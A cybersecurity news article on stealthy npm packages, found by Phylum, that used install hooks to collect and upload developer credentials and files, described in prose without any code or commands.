- Modernizing patch management in an evolving IT security landscape
- G2 Names INE 2024 Enterprise and Small Business Leader
- 메가존클라우드, 하나투어에 맞춤형 AI 챗봇 서비스 구현 발표
- GITEX GLOBAL 2024: Huawei to Accelerate Industrial Digitalization and Intelligence
- 5 ways to balance self-promotion with the demands of the business
Stealthy npm Malware Exposes Developer Data
A stealthy malware has been discovered on npm, the popular package manager for JavaScript, that poses a severe threat by exposing sensitive developer data.
The findings come from cybersecurity firm Phylum, who said that on July 31 2023, their automated risk detection platform raised an alert regarding suspicious activities on npm.
Over the course of a few hours, ten seemingly innocuous “test” packages were published. On closer inspection, Phylum’s researchers discovered that these packages were part of a sophisticated and targeted malware attack aimed at exfiltrating sensitive developer source code and confidential information.
The attack demonstrated a carefully crafted development cycle, with the attacker refining the malware’s functionality through several iterations. The final “production” packages were disguised with legitimate-sounding names, potentially tricking victims into installing them unwittingly.
Read more on typosquatting: Malicious Npm Package Uses Typosquatting, Downloads Malware
Upon analyzing the attack code, Phylum uncovered that it utilized a combination of post-install hooks and pre-install scripts to trigger the execution of malicious code once the packages were installed. This code was designed to perform several actions.
First, the malware gathered the machine’s operating system (OS) username and current working directory and sent this information as URL query parameters in an HTTP GET request to a remote server.
Next, the malware scanned the victim’s directories for files with specific extensions or located in specific directories known to contain sensitive information, such as credentials or configuration files.
Once the target files and directories were identified, the malware created ZIP archives, excluding certain standard application directories to avoid unnecessary bulk. Finally, the malware attempted to upload the compressed archives to an FTP server.
In an advisory published on Thursday, Phylum’s experts noted that the attack’s primary targets appeared to be developers involved in the cryptocurrency sphere.
The document also contains additional information about the attack, including the source code of the malware and more details about the attack chain.
Its publication comes hours after ReversingLabs discovered new malicious packages on the PyPI repository.